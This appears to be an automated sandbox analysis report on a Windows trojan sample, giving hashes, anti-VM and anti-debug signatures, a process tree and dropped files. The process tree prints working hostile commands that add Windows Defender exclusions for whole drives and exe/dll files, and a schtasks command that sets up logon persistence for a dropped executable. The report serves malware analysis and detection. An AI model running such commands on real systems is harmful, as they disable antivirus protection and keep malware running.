Analysis
- max time kernel: 136s
- max time network: 126s
- platform: windows7_x64
- resource: win7-en-20211104
- submitted: 06-12-2021 03:15

Static task: static1
Behavioral task: behavioral1
Sample: SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
Resource: win7-en-20211104
General
- Target: SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
- Size: 4.9MB
- MD5: 7b7cfe46454f0f7a9c046636eb66dda0
- SHA1: 9ef56977d9b96e81e42f94ef29b144698685e5d3
- SHA256: 47e2b9d18762b81536a9a236a382302f9fcb3114e3723a2e90277b903448b536
- SHA512: 28e5b8eca9048855829528d8e235e52168588c247e036acae791927b9f703394975c38dedcc01a6bdfcefdd1e580d882d97f6eec3a6983c1b21fb4a04cdd0cfd
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 2 IoCs
Processes (pid, process):
- 280 services64.exe
- 1464 sihost32.exe
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe
-
Loads dropped DLL 2 IoCs
Processes (pid, process):
- 1184 cmd.exe
- 280 services64.exe
-
Yara rule matches
Processes (resource, yara_rule):
- behavioral1/memory/736-58-0x000000013F360000-0x000000013F361000-memory.dmp themida
- \Users\Admin\AppData\Local\Temp\services64.exe themida
- C:\Users\Admin\AppData\Local\Temp\services64.exe themida
- behavioral1/memory/280-86-0x000000013FEE0000-0x000000013FEE1000-memory.dmp themida
- C:\Users\Admin\AppData\Local\Temp\services64.exe themida
-
Checks whether UAC is enabled
Processes (description, ioc, process):
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe
-
Drops file in System32 directory 2 IoCs
Processes (description, ioc, process):
- File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe
- File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes (pid, process):
- 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
- 280 services64.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes (pid, process):
- 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
- 596 powershell.exe
- 1904 powershell.exe
- 280 services64.exe
- 280 services64.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes (description, pid, process):
- Token: SeDebugPrivilege 736 SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
- Token: SeDebugPrivilege 596 powershell.exe
- Token: SeDebugPrivilege 1904 powershell.exe
- Token: SeDebugPrivilege 280 services64.exe
-
Suspicious use of WriteProcessMemory 30 IoCs
Processes (description, pid, process, target process); each of the ten entries below is recorded three times in the report:
- PID 736 wrote to memory of 1008: SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe -> cmd.exe
- PID 1008 wrote to memory of 596: cmd.exe -> powershell.exe
- PID 736 wrote to memory of 980: SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe -> cmd.exe
- PID 980 wrote to memory of 1828: cmd.exe -> schtasks.exe
- PID 1008 wrote to memory of 1904: cmd.exe -> powershell.exe
- PID 736 wrote to memory of 1184: SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe -> cmd.exe
- PID 1184 wrote to memory of 280: cmd.exe -> services64.exe
- PID 280 wrote to memory of 1728: services64.exe -> cmd.exe
- PID 1728 wrote to memory of 892: cmd.exe -> powershell.exe
- PID 280 wrote to memory of 1464: services64.exe -> sihost32.exe
Processes (process tree; indentation shows parent/child relationship)

- C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop19.10258.32603.24964.exe"
  PID: 736
  Signatures: Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

  - C:\Windows\system32\cmd.exe
    Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    PID: 1008
    Signatures: Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      PID: 596
      Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      PID: 1904
      Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\system32\cmd.exe
    Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
    PID: 980
    Signatures: Suspicious use of WriteProcessMemory

    - C:\Windows\system32\schtasks.exe
      Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      PID: 1828
      Signatures: Creates scheduled task(s)

  - C:\Windows\system32\cmd.exe
    Command line: "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
    PID: 1184
    Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory

    - C:\Users\Admin\AppData\Local\Temp\services64.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\services64.exe
      PID: 280
      Signatures: Executes dropped EXE; Checks BIOS information in registry; Loads dropped DLL; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

      - C:\Windows\system32\cmd.exe
        Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        PID: 1728
        Signatures: Suspicious use of WriteProcessMemory

        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          PID: 892

      - C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
        Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
        PID: 1464
        Signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\services64.exe (also listed as \Users\Admin\AppData\Local\Temp\services64.exe; its hashes match the submitted sample)
  MD5: 7b7cfe46454f0f7a9c046636eb66dda0
  SHA1: 9ef56977d9b96e81e42f94ef29b144698685e5d3
  SHA256: 47e2b9d18762b81536a9a236a382302f9fcb3114e3723a2e90277b903448b536
  SHA512: 28e5b8eca9048855829528d8e235e52168588c247e036acae791927b9f703394975c38dedcc01a6bdfcefdd1e580d882d97f6eec3a6983c1b21fb4a04cdd0cfd
- C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe (also listed as \Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe)
  MD5: 1674dd9c7a7775b73be309ad1c62ffd4
  SHA1: 44eca69c94e11a4ad6f186e3205d8a96150b228c
  SHA256: d223e6e836d93bf5af48c21fe6ec7a9e31dd4b351111cce77f0b3cd0a2679c0a
  SHA512: 059918fc77df9663ad57879a50e1a2803a5d84c73117d2a991908043899a88cd16f4b1fb45bdfc93e3a446be6ddbe6546b11cc85553c245b810ea226fb93affd
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 7105da437756662a49da27785b01c756
  SHA1: f6dce822ef6eccb95c222c20d543555ef2d96d06
  SHA256: 3611ca45b6d812868bedbb127b4d33af701e70a89b78b474ff635d6952275ce7
  SHA512: ba3e05b2fbc1468e9022ed76b15d5f345d5fc9bc82d3b9250376eb8283f9e8729c97fcb06eb83a12ea6ac9d7d5abf63138515e04f7125dbffb7e14e5368a1331